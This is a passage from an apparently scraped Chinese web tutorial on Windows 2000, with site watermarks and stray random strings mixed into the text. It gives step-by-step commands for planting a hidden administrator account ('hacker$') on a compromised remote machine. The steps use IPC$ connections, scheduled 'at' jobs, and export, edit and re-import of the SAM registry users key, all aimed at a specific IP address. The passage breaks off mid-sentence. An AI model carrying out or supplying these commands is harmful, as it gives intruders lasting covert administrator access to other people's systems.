| 贵 州 学 习 网 |
|
2、先与肉鸡建立连接,命令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator
3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51 ^rR5d!3T&W1G/4H [ 本 资 料 来 源 于 贵 州 学 习 网 电脑课堂Windows 2000教程 http://Www.gzU521.com ] ^rR5d!3T&W1G/4H c:\winnt\system32\net.exe user hacker$ 1234 /add 建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。 4、同样用at命令导出hkey_local_machine\sam\sam\domains\account\users下键值:at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg hkey_local_machine\sam\sam\domains\account\users\ /e 是regedit.exe的参数,在_local_machine\sam\sam\domains\account\users\这个键的一定要以\结尾。必要的情况下可以用引号将"c:\winnt\regedit.exe /e hacker.reg hkey_local_machine\sam\sam\domains\account\users\"引起来。 5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg 修改的方法图形界中已经介绍过了,这里就不作介绍了。 6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg 7、查看肉鸡时间:net time \\13.50.97.238 然后用at命令将用户hacker$删除: at \\13.50.97.238 13:40 net user hacker$ /del 8、验证hacker$是否删除:用 net use \\13.50.97.238 /del 断开与肉鸡的连接。 net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。 9、再与肉鸡建立连接:net use \\13.50.97.238\ipc$ "12345678" /user:"administrator" 再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表: at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg regedit.exe的参数/s是指安静模式。 10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。 x73|5GKet-*[ 此文转贴于我的学习网电脑课堂Windows 2000教程 http://www.Gzu521.com]x73|5GKet-* 11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。 12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。 三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办? 这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。 但是这里有两个前提: 1、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与> |
责任编辑:gzu521